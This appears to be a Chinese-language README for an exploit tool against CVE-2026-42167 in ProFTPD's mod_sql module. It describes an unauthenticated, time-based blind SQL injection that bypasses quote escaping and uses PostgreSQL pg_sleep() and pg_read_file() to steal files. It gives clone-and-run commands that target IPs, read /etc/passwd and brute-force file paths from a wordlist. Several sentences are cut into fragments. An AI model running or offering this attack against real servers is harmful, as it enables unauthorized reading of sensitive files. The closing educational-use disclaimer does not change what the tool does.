一款专业的安全研究工具,用于利用 ProFTPD mod_sql 模块中的 CVE-2026-42167 漏洞。该工具通过基于时间的侧信道攻击,执行未认证的 SQL 注入,从服务器中窃取敏感文件。
"注意:该工具的效率取决于 PostgreSQL 用户的权限以及网络稳定性。"
CVE-2026-42167 是 ProFTPD is_escaped_text() 函数中的一个严重逻辑缺陷。当 mod_sql 配置为记录 USER 命令时,攻击者可以通过提供以单引号(')开头和结尾的输入来绕过 SQL 转义。该工具利用此绕过机制执行 PostgreSQL 特定命令。
USER 日志记录,则无需任何凭据。pg_sleep() 和 pg_read_file() 实现可靠利用。/**/)绕过空格过滤机制。git clone https://github.com/efeanilarslan/CVE-2026-42167-Exploit
cd CVE-2026-42167-Exploit
pip install -r requirements.txt # (无需外部依赖)
python3 proftpd_master_exploit.py -t <目标IP> -p 2121
python3 proftpd_master_exploit.py -t <目标IP> -f /etc/passwd
python3 proftpd_master_exploit.py -t <目标IP> -w common.txt -s 1.5
| 标志 | 描述 | 默认值 |
|---|---|---|
-t | 目标 IP 地址 | 必填 |
-p | 目标 FTP 端口 | 2121 |
-s | 定时攻击的休眠时长 | 2.0 秒 |
-w | 用于文件发现的字典 | 无 |
-f | 要窃取的特定文件路径 | 无 |
本工具仅用于教育目的和授权安全测试。开发者不对因使用本程序造成的任何滥用或损害负责。请负责任地使用。